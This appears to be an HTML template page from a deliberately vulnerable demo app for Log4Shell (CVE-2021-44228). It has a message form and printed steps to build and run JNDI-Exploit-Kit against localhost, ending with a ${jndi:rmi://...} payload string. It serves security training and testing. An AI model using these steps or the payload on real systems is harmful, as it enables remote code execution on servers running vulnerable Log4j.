<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
  <head>
    <title>Log4Shell(CVE-2021-44228)</title>
  </head>
  <body>
    <h1>Log4Shell(CVE-2021-44228)</h1>
    <div>
      <form method="post" th:action="@{/log}">
        <div>
          <label for="message">message:</label>
          <input type="text" name="message" th:value="${message}" />
          <input type="submit" value="Send" />
        </div>
      </form>
    </div>
    <div>
      <h3>JNDI Server Preparation:</h3>
      <pre>
git clone https://github.com/pimps/JNDI-Exploit-Kit
docker run -it --rm -v "{PathToClonedDir}:/work" -w /work --name jndiserver -p 1389:1389 -p 1099:1099 maven:3-openjdk-11 bash
mvn clean package -DskipTests
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<b>calc</b>" -L "127.0.0.1:1389" -R "127.0.0.1:1099"

->
------------------------------------------------------------------------------------------------------------------------------------------------------
...
Target environment(Build in JDK - (BYPASS WITH EL by @welk1n) whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/<b>xxxxxx</b>
...
------------------------------------------------------------------------------------------------------------------------------------------------------

-> You can use the following value.
${jndi:rmi://127.0.0.1:1099/<b>xxxxxx</b>}
      </pre>
    </div>
  </body>
</html>